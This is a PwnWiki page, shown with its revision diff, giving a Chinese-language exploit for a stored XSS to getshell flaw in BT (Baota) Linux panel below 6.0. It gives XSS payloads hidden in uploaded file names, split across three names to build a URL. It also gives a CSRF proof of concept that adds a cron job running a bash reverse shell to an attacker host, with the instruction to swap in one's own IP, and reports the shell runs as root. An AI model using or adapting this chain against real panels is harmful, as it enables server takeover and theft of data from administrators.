Difference between revisions of "寶塔linux面板 6.0 存儲型XSS Getshell漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <translate> 寶塔Linux面板<6.0 </translate> <translate> ==漏洞利用== </translate> <translate> 在web目錄下...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
寶塔Linux面板<6.0 | 寶塔Linux面板<6.0 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:3--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
在web目錄下上傳一個文件名為<code><img src=x onerror="alert(1)"></code>的文件 | 在web目錄下上傳一個文件名為<code><img src=x onerror="alert(1)"></code>的文件 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
寶塔後台瀏覽文件,觸發payload | 寶塔後台瀏覽文件,觸發payload | ||
</translate> | </translate> | ||
| Line 48: | Line 51: | ||
<translate> | <translate> | ||
| + | <!--T:6--> | ||
修改poc中的ip地址,上傳到test.com中,當寶塔管理員訪問這個頁面以後,會自動添加反彈shell的計劃任務 | 修改poc中的ip地址,上傳到test.com中,當寶塔管理員訪問這個頁面以後,會自動添加反彈shell的計劃任務 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:7--> | ||
新建三個文件,文件名分別為: | 新建三個文件,文件名分別為: | ||
</translate> | </translate> | ||
| Line 61: | Line 66: | ||
<translate> | <translate> | ||
| + | <!--T:8--> | ||
payload觸發以後會自動打開test.com網頁 | payload觸發以後會自動打開test.com網頁 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:9--> | ||
將上一步CSRF的payload部署到test.com,管理員瀏覽文件的時候即可觸發,觸發後五分鐘會反彈shell(ROOT權限) | 將上一步CSRF的payload部署到test.com,管理員瀏覽文件的時候即可觸發,觸發後五分鐘會反彈shell(ROOT權限) | ||
</translate> | </translate> | ||
Latest revision as of 08:12, 26 June 2021
漏洞影響
寶塔Linux面板<6.0
漏洞利用
在web目錄下上傳一個文件名為<img src=x onerror="alert(1)">的文件
寶塔後台瀏覽文件,觸發payload
Get cookie:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://1.1.1.1:8888/crontab?action=AddCrontab" method="POST">
<input type="hidden" name="name" value="test" />
<input type="hidden" name="type" value="minute-n" />
<input type="hidden" name="where1" value="5" />
<input type="hidden" name="hour" value="" />
<input type="hidden" name="minute" value="" />
<input type="hidden" name="week" value="" />
<input type="hidden" name="sType" value="toShell" />
<input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
<input type="hidden" name="sName" value="" />
<input type="hidden" name="backupTo" value="localhost" />
<input type="hidden" name="urladdress" value="" />
<input type="hidden" name="save" value="" />
<input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
<input type="hidden" name="urladdress" value="" />
<input type="submit" id="a" value="Submit request" />
</form>
</body>
<script>
document.getElementById('a').click()
</script>
</html>
修改poc中的ip地址,上傳到test.com中,當寶塔管理員訪問這個頁面以後,會自動添加反彈shell的計劃任務
新建三個文件,文件名分別為:
a<img src=x onerror="a=String.fromCharCode(47)"> b<img src=x onerror="b='.com'"> c<img src=x onerror="window.open(a+a+'test'+b)">
payload觸發以後會自動打開test.com網頁
將上一步CSRF的payload部署到test.com,管理員瀏覽文件的時候即可觸發,觸發後五分鐘會反彈shell(ROOT權限)
